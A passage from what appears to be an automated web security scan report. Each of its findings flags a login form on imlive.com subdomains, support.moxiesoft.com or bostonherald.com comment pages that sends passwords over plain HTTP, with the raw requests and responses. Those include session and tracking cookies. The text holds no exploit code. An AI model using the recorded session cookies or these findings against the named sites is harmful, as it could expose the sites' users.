Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.20. http://mx.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mx.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://mx.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a13018e7-4eaf-491b-9a58-2a08ebf5d10b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:13 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 18291
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.21. http://nl.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://nl.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=172f260c-f292-40e5-922e-4377befca272&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 17934
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.22. http://no.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://no.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=cb56a9d1-56fd-458b-a829-3574e99ee9f7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 18070
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.23. http://pu.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pu.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: spvdr=vd=17b1032e-9627-4037-aed9-7b33fd1318f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 20659
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.24. http://ru.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://ru.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: spvdr=vd=5d548b95-834a-4b5b-a38b-38fb7d9bb957&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:20 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:19 GMT
Connection: close
Content-Length: 20234
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.25. http://se.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://se.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
Set-Cookie: spvdr=vd=bb5a5452-c2c5-404a-ad75-499130dd5dbd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 18020
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.26. http://support.moxiesoft.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.moxiesoft.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://support.moxiesoft.com/login.asp

The form contains the following password field:

txtPasswd

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


                                   <form id="frmNewLogin" name="frmNewLogin" method="post" action="login.asp">
                                   <input type="hidden" id="txtProductID" name="txtProductID">
...[SNIP]...
<td width="150"><input type="password" name="txtPasswd" id="txtPasswd" /></td>
...[SNIP]...

6.27. http://tr.imlive.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://tr.imlive.com/members.aspx

The form contains the following password field:

txtPassword

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: spvdr=vd=1b813c63-80cf-4620-830f-91884d66145b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 18499
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">

<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.28. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.29. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.30. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

The form contains the following password fields:

password
confirm_password

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.31. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.32. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

The form contains the following password fields:

password
confirm_password

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.33. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.34. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

The form contains the following password fields:

password
confirm_password

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
